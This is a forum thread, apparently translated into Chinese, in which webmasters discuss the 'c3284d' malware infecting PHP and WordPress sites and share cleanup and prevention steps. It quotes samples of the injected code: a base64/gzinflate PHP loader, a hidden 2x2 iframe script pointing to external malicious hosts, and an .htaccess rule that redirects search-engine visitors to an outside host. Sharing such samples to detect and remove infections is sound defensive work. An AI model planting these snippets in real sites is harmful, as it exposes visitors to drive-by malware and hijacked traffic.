在过去的几天里,我的网站多次成为iframe攻击的目标。代码主要附加在PHP和Javascript页面上。然后代码是PHP base64编码的,参见示例(我稍微修改了代码以中和它):
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
这个解码的看起来像这样:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
一个共同点是,所有代码都有注释"#c3284d#",因此追踪恶意代码并不困难。但这很耗时。。。
我们在Gradwell(英国)的共享服务器上,他们并没有特别的帮助。所以问题是,我能做些什么来阻止这个问题重演?我知道MySQL注入攻击,并使用PHP的MySQL_real_eescape_string来防范此类攻击。
该网站是PHP和MySQL驱动器。我们使用MySQLFTP,并有一个用于SSH访问的shell帐户。我们使用Wordpress(插件停用的最新更新)。
我遇到了同样的问题。FTP服务器的访问日志显示,这些修改是使用被黑客入侵的FTP密码进行的。
我在许多不同的域上遇到了相同的问题和不同的黑客文件的变体。我注意到的一件常见的事情是Wordpress。我们在许多这样的服务器上都有wordpress,我认为这是常见的罪魁祸首。我已经更新了我所有的wordpress帐户,更改了所有域帐户的所有pword。不确定问题是否已经完全解决。
我遇到了同样的问题,但进入了Wordpress网站。
我想这个网站是通过小部件感染的,因为我使用了一个允许执行PHP代码的插件。
我最好的解决方案是:
- 消除可疑的小部件
- 查看一个受感染文件的时间和日期(我的案例:header.php)
- 清除所有受感染的文件(在我的情况下,我有网站的备份)
- 在日志文件中搜索当时的可疑IP(搜索黑名单上的IP)
- 安装一个插件来禁止可疑IP
从那一刻起,问题就消失了。我希望这对你有帮助。
在我管理的所有Wordpress网站上都遇到了同样的问题。没有找到感染源,我敢打赌是我电脑上的蠕虫,或者是我在所有网站上安装的插件。
我在WP Better安全插件日志中找到了所有被修改的文件,并删除了额外的感染代码,之后我在所有感染源文件上制作了chmod 444。
现在我已经自由了一个月的邪恶的iframe/htaccess和其他东西。
我也遇到了同样的问题,发现他们进入的方法是一个被黑客入侵的ftp密码。
尽管这是在启用了CPHulk暴力保护的cPanel服务器上运行的,但我发现黑客试图通过数千台不同的受损主机强行进入。
幸运的是,我有上传的所有文件的日志,所以我写了一个脚本来从备份中恢复这些文件。
然后,我通过减少锁定帐户前所需的失败尝试次数,提高了cPanel暴力保护级别。
我建议您看看这个:
http://websiteprotection.blogspot.pt/2009/10/measures-to-prevent-and-detect-iframe.html
它还有一个脚本来清理它。
我也有同样的问题。在我的情况下,附加的代码是
<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
此外,还有一个.htaccess文件如下:
> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)'.(.*)
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php
> [R=301,L] </IfModule>
> #/c3284d#
我发现了两篇关于这个问题的文章:http://www.webmasterworld.com/html/4472821.htm和http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html
希望它能帮助
坏人可以访问你的代码,所以你必须关闭他们的访问权限,同时你可以使用一个简单的脚本来检查和删除检测到gzinflate的所有行(base64_decode,但如果他们仍然可以访问,即使是最好的代码(带有备份文件的校验和检查器)也将毫无用处